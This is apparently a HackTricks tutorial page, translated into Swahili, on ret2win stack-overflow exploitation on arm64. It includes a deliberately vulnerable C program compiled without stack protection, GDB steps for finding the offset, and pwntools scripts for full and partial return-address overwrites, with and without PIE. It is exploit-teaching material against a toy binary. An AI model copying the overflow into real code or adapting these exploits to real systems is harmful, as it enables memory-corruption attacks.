Ret2win - arm64
Reading time: 4 minutes
tip
Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
Pata utangulizi wa arm64 katika:
{{#ref}} ../../../macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md {{#endref}}
Code
#include <stdio.h>
#include <unistd.h>
void win() {
printf("Congratulations!\n");
}
void vulnerable_function() {
char buffer[64];
read(STDIN_FILENO, buffer, 256); // <-- bof vulnerability
}
int main() {
vulnerable_function();
return 0;
}
Kusanya bila pie na canary:
clang -o ret2win ret2win.c -fno-stack-protector -Wno-format-security -no-pie
Kupata offset
Chaguo la muundo
Mfano huu ulitengenezwa kwa kutumia GEF:
Anza gdb na gef, tengeneza muundo na uvitumie:
gdb -q ./ret2win
pattern create 200
run
![](../../../images/image (1205).png)
arm64 itajaribu kurudi kwenye anwani katika register x30 (ambayo ilikua imeharibiwa), tunaweza kutumia hiyo kupata ofset ya muundo:
pattern search $x30
![](../../../images/image (1206).png)
Kipimo ni 72 (9x48).
Chaguo la kipimo cha stack
Anza kwa kupata anwani ya stack ambapo usajili wa pc umehifadhiwa:
gdb -q ./ret2win
b *vulnerable_function + 0xc
run
info frame
![](../../../images/image (1207).png)
Sasa weka breakpoint baada ya read()
na uendelee hadi read()
itakapotekelezwa na uweke muundo kama 13371337:
b *vulnerable_function+28
c
![](../../../images/image (1208).png)
Pata mahali ambapo muundo huu umehifadhiwa katika kumbukumbu:
![](../../../images/image (1209).png)
Kisha: 0xfffffffff148 - 0xfffffffff100 = 0x48 = 72
![](../../../images/image (1210).png)
Hakuna PIE
Kawaida
Pata anwani ya kazi ya win
:
objdump -d ret2win | grep win
ret2win: file format elf64-littleaarch64
00000000004006c4 <win>:
Kuvunja:
from pwn import *
# Configuration
binary_name = './ret2win'
p = process(binary_name)
# Prepare the payload
offset = 72
ret2win_addr = p64(0x00000000004006c4)
payload = b'A' * offset + ret2win_addr
# Send the payload
p.send(payload)
# Check response
print(p.recvline())
p.close()
![](../../../images/image (1211).png)
Off-by-1
Kwa kweli hii itakuwa kama off-by-2 katika PC iliyohifadhiwa kwenye stack. Badala ya kufuta anwani zote za kurudi, tutafuta tu byte 2 za mwisho kwa 0x06c4
.
from pwn import *
# Configuration
binary_name = './ret2win'
p = process(binary_name)
# Prepare the payload
offset = 72
ret2win_addr = p16(0x06c4)
payload = b'A' * offset + ret2win_addr
# Send the payload
p.send(payload)
# Check response
print(p.recvline())
p.close()
![](../../../images/image (1212).png)
Unaweza kupata mfano mwingine wa off-by-one katika ARM64 katika https://8ksec.io/arm64-reversing-and-exploitation-part-9-exploiting-an-off-by-one-overflow-vulnerability/, ambayo ni off-by-one halisi katika udhaifu wa kufikirika.
Pamoja na PIE
tip
Jenga binary bila ya -no-pie
argument
Off-by-2
Bila leak hatujui anwani halisi ya kazi ya kushinda lakini tunaweza kujua offset ya kazi kutoka kwa binary na kujua kwamba anwani ya kurudi tunayopitisha tayari inaelekeza kwenye anwani ya karibu, inawezekana kuvuja offset kwa kazi ya kushinda (0x7d4) katika kesi hii na kutumia tu offset hiyo:
![](../../../images/image (1213).png)
from pwn import *
# Configuration
binary_name = './ret2win'
p = process(binary_name)
# Prepare the payload
offset = 72
ret2win_addr = p16(0x07d4)
payload = b'A' * offset + ret2win_addr
# Send the payload
p.send(payload)
# Check response
print(p.recvline())
p.close()
tip
Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.